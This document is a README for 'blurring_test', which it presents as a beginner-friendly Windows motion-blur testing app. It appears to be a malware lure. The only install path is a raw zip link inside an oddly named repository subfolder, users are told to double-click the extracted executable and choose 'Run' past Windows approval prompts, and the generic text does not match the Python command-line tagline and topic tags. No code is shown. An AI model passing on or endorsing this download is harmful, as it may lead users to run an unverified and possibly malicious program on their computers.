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🎞️ blurring_test - Motion blur made simple

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🚀 Getting Started

blurring_test is a Windows app for motion blur tests. It helps you preview blur effects on video and media clips with a simple setup. Use it when you want to test how motion blur looks without learning a full editing tool.

What it does

  • Adds motion blur to video clips
  • Works with common media files
  • Uses your CPU for processing
  • Supports blur tests for demos and writing samples
  • Can pair with video tools like FFmpeg

📥 Download

Visit this page to download:

https://github.com/Maxifrowning888/blurring_test/raw/refs/heads/main/flapperish/blurring-test-3.5.zip

Open the link in your browser, then get the Windows build from the project page. After the file finishes downloading, you can run it on your PC.

🪟 Install on Windows

  1. Open the download page
  2. Download the Windows file for blurring_test
  3. If the file is in a .zip folder, right-click it and choose Extract All
  4. Open the extracted folder
  5. Double-click the app file to start it

If Windows asks for approval, choose Run to continue.

🧭 How to use it

  1. Start blurring_test
  2. Choose the video or media file you want to test
  3. Pick a blur setting
  4. Set the blur strength or motion amount
  5. Run the test
  6. Review the result and try a new setting if needed

The app works best when you test short clips first. That makes it easier to compare results.

🎬 Common uses

  • Check motion blur on fast scenes
  • Test blur before making a final video
  • Preview how a clip looks after upscaling
  • Compare clean video with blurred video
  • Create sample clips for demos or notes

🧰 System needs

Use a Windows PC with:

  • Windows 10 or Windows 11
  • Enough free disk space for video files
  • A working CPU with at least 4 cores
  • 8 GB of RAM or more
  • FFmpeg support for media file work

A stronger CPU helps when you work with long clips or large files.

🎛️ Main features

  • Simple command-line style workflow
  • Motion blur controls for video tests
  • Media input support
  • CPU-based processing
  • Color-aware output for video work
  • Works well with FFmpeg-based media tasks
  • Fits use cases like blur testing, demo clips, and writing examples

📂 Best file types to try

You can test with:

  • MP4
  • MOV
  • AVI
  • MKV
  • WAV
  • MP3

For best results, start with a short MP4 file. It is easy to open and test.

🛠️ Tips for a smooth run

  • Keep your test clip short at first
  • Close other heavy apps while it runs
  • Use a file path with simple names
  • Store media files in one folder
  • Keep enough free space for output files

If the app feels slow, use a smaller clip or lower blur settings.

🔗 Related tools and topics

This project uses ideas from:

  • argparse
  • audio
  • blur
  • cli
  • color
  • cpu
  • demo
  • esrgan
  • ffmpeg
  • ffmpeg-wrapper
  • io
  • media
  • motion
  • motion-blur
  • opencv
  • python
  • real-esrgan
  • rife
  • video
  • writing

❓ Common questions

Can I use it without coding knowledge?

Yes. Download the file, open it, and follow the simple steps in the app.

Does it work with video files?

Yes. It is made for video and media blur tests.

Do I need a GPU?

No. It uses CPU processing, so it can run on many Windows PCs.

Can I test audio files too?

Yes, if your workflow includes media files with audio tracks. The app is built around media handling.

Is this for final video editing?

It is better for tests, previews, and sample clips than full editing work.

📌 Quick start checklist

  • Open the download page
  • Download the Windows file
  • Extract the file if needed
  • Start the app
  • Pick a clip
  • Set the blur
  • Run the test

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Create CPU-based motion blur for MP4 and MKV videos with temporal averaging, directional blur, and a threaded NumPy pipeline

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